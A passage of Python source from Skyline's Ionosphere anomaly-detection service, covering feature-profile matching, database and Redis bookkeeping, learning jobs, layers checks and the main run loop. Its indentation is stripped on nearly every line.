del df_t
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
# @modified 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
# Use the common function added
# try:
# fp_sum_array = [minmax_fp_features_sum]
# calc_sum_array = [minmax_anomalous_features_sum]
# percent_different = 100
# sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
# calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
# percent_different = calc_percent_different[0]
# logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
# except Exception as e:
# logger.error(traceback.format_exc())
# logger.error('error :: failed to calculate percent_different from minmax scaled features sums - %s' % e)
percent_different = 100
try:
percent_different = get_percent_different(minmax_fp_features_sum, minmax_anomalous_features_sum, True)
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
except Exception as e:
logger.error('error :: failed to calculate percent_different between minmax scaled features sums - %s' % e)
if percent_different:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Bifurcate for ionosphere_echo_check
if check_type == 'ionosphere':
mm_use_percent_similar = float(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR)
if check_type == 'ionosphere_echo_check':
try:
mm_use_percent_similar = float(settings.IONOSPHERE_ECHO_MINMAX_SCALING_FEATURES_PERCENT_SIMILAR)
except:
mm_use_percent_similar = 3.5
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
if percent_different < mm_use_percent_similar:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum is within %s percent of fp_id %s with %s, not anomalous' %
(str(mm_use_percent_similar),
str(fp_id), str(percent_different)))
if check_type == 'ionosphere_echo_check':
logger.info('ionosphere_echo_check :: not anomalous - minmax scaled features profile match - %s' % (base_name))
if minmax_not_anomalous:
not_anomalous = True
minmax = 1
# Clean up the minmax time series resources that were created
# for graphing in the matched page
try:
if os.path.isfile(minmax_fp_ts_csv):
self.remove_metric_check_file(str(minmax_fp_ts_csv))
except:
pass
try:
if os.path.isfile(minmax_fp_fname_out):
self.remove_metric_check_file(str(minmax_fp_fname_out))
except:
pass
# @added 20190327 - Feature #2484: FULL_DURATION feature profiles
# Clean up echo files
if echo_check:
echo_calculated_feature_file = '%s/%s.echo.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
try:
if os.path.isfile(echo_calculated_feature_file):
self.remove_metric_check_file(str(echo_calculated_feature_file))
except:
pass
echo_features_file = '%s/%s.%s.echo.fp.details.txt' % (metric_training_data_dir, str(metric_timestamp), base_name)
try:
if os.path.isfile(echo_features_file):
self.remove_metric_check_file(str(echo_features_file))
except:
pass
# Clean up
if minmax_check:
try:
clean_file = anomalous_ts_csv
if os.path.isfile(anomalous_ts_csv):
self.remove_metric_check_file(str(anomalous_ts_csv))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_ts_csv file to clean up')
try:
clean_file = anomalous_fp_fname_out
if os.path.isfile(anomalous_fp_fname_out):
self.remove_metric_check_file(str(anomalous_fp_fname_out))
logger.info('cleaned up - %s' % clean_file)
except:
logger.info('no anomalous_fp_fname_out file to clean up')
# END - Feature #2404: Ionosphere - fluid approximation
if not_anomalous:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.not_anomalous.append(base_name)
redis_set = 'ionosphere.not_anomalous'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# update matched_count in ionosphere_table
matched_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update matched details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update matched details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(matched_count=ionosphere_table.c.matched_count + 1,
last_matched=matched_timestamp))
connection.close()
logger.info('updated matched_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update matched_count and last_matched for %s ' % str(fp_id))
# @added 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched update
# @modified 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update ionosphere_matched for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update ionosphere_matched for %s' % (str(fp_id)))
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_matched_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_matched_table meta for %s' % base_name)
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
if minmax_not_anomalous == 1:
minmax_fp_features_sum = float(minmax_fp_features_sum)
minmax_fp_features_count = int(minmax_fp_features_count)
minmax_anomalous_features_sum = float(minmax_anomalous_features_sum)
minmax_anomalous_features_count = int(minmax_anomalous_features_count)
else:
minmax_fp_features_sum = 0
minmax_fp_features_count = 0
minmax_anomalous_features_sum = 0
minmax_anomalous_features_count = 0
# @added 20190919 - Feature #2484: FULL_DURATION feature profiles
# If there are additional echo fps then the database can be
# updated with the fp_count_with_echo value for fp_count in
# the ionosphere_matched table
if fp_count_with_echo > fp_count:
fp_count = fp_count_with_echo
try:
connection = engine.connect()
# @modified 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added all_calc_features_sum, all_calc_features_count,
# sum_calc_values, common_features_count, tsfresh_version
ins = ionosphere_matched_table.insert().values(
fp_id=int(fp_id),
metric_timestamp=int(metric_timestamp),
all_calc_features_sum=float(all_calc_features_sum),
all_calc_features_count=len(all_calc_features_sum_list),
sum_common_values=float(sum_calc_values),
common_features_count=int(relevant_calc_feature_values_count),
tsfresh_version=str(tsfresh_version),
# @added 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax scaling values
minmax=minmax,
minmax_fp_features_sum=minmax_fp_features_sum,
minmax_fp_features_count=minmax_fp_features_count,
minmax_anomalous_features_sum=minmax_anomalous_features_sum,
minmax_anomalous_features_count=minmax_anomalous_features_count,
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_count=fp_count, fp_checked=fp_checked)
result = connection.execute(ins)
connection.close()
new_matched_id = result.inserted_primary_key[0]
# @modified 20180620 - Feature #2404: Ionosphere - fluid approximation
# Added minmax
if minmax == 0:
logger.info('new ionosphere_matched id: %s' % str(new_matched_id))
else:
logger.info('new minmax scaled ionosphere_matched id: %s' % str(new_matched_id))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: could not update ionosphere_matched for %s with timestamp %s' % (
str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too as it has proved useful
# in the frontend with regards to training data sets being
# matched by layers and can do the same in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check then we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
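# Note: the query below rate limits learning - if any learnt
# (generation > 1) features profile was created for this metric within
# the last hour at the same or a longer full_duration, no further
# learning is attempted on this run.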
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not send Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
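# Note: each ionosphere.learn.work item is the string representation of
# a list in the form [deadline, job, metric_timestamp, base_name, fp_id,
# generation] added to the ionosphere.learn.work Redis set below.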
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had
# an opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implementation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
if anomalous_timeseries:
    logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries)))
else:
logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
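# Note: anomalous_timeseries is the parsed training data timeseries, a
# list of [timestamp, value] datapoints - the raw json may contain
# tuple style datapoints so '(' and ')' are replaced with '[' and ']'
# before the literal_eval above.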
matched_layers_id = None
for layers_id in fp_layers_ids:
if not not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to Redis set here and commented out the
# self.layers_checked.append in the try below this
redis_set = 'ionosphere.layers_checked'
data = layers_id
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to the ionosphere.layers_checked Redis set
# above
# self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learning from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
# @added 20210429 - Feature #3994: Panorama - mirage not anomalous
# A hash is added to the ionosphere.panorama.not_anomalous_metrics for
# every metric that is found to be not anomalous.
try:
add_not_anomalous_to_redis_hash(base_name, metric_timestamp, anomalous_value, full_duration)
except Exception as e:
logger.error('error :: failed calling add_not_anomalous_to_redis_hash - %s' % e)
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
remove_waterfall_alert(added_by, metric_timestamp, base_name)
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(base_name)
redis_set = 'ionosphere.anomalous_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed in single quotes intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
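# For illustration only (all values below are hypothetical), the
# resulting Panorama check file is a simple Python variable file along
# the lines of:
# metric = 'stats.server-1.cpu.user'
# value = '5622.0'
# from_timestamp = '1614000000'
# metric_timestamp = '1614086400'
# algorithms = ['histogram_bins', 'ks_test']
# triggered_algorithms = ['ks_test']
# app = 'ionosphere'
# source = 'graphite'
# added_by = 'skyline-host-1'
# added_at = '1614086460'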
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the Redis set function below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
logger.info(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'ionosphere.sent_to_panorama'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# @added 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# Added cache_key_value
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(
# cache_key, 300,
# # modified 20190412 - Task #2824: Test redis-py upgrade
# # Task #2926: Update dependencies
# # [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
# str(cache_key_value))
# logger.info(
# 'add Redis alert key - %s - %s' %
# (cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
# @modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if dev_null:
del dev_null
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process initializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
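# Note: wait for up to 5 seconds for the bin/<skyline_app>.d log
# management to remove the log lock file before carrying on regardless.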
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
logger.info('SKYLINE_FEEDBACK_NAMESPACES is set to %s' % str(SKYLINE_FEEDBACK_NAMESPACES))
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @added 20191115 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
continue
# Report app up
try:
# @modified 20210524 - Branch #1444: thunder
# Report app AND Redis as up
# self.redis_conn.setex(skyline_app, 120, now)
# logger.info('updated Redis key for %s up' % skyline_app)
redis_is_up = self.redis_conn.setex(skyline_app, 120, now)
if redis_is_up:
logger.info('updated Redis key for %s up' % skyline_app)
try:
self.redis_conn.setex('redis', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: could not update the Redis redis key - %s' % (
e))
except Exception as e:
logger.error('error :: failed to update Redis key for %s up - %s' % (skyline_app, e))
# @modified 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Wrapped purging up in a conditional to allow the user to offload
# purging to a script and cron if they so desire for any reason.
if IONOSPHERE_MANAGE_PURGE:
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
# @added 20200723 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Do not purge every run
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
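# Note: the last_purge_key Redis key acts as a simple timer here,
# purge_old_data_dirs is only run when the key does not exist rather
# than on every loop.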
if not last_purge_timestamp:
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' % (
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR))
else:
logger.info('purge is not managed by Ionosphere - IONOSPHERE_MANAGE_PURGE = %s' % str(IONOSPHERE_MANAGE_PURGE))
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage training data
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('running purge_old_data_dirs only to manage ionosphere.training_data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
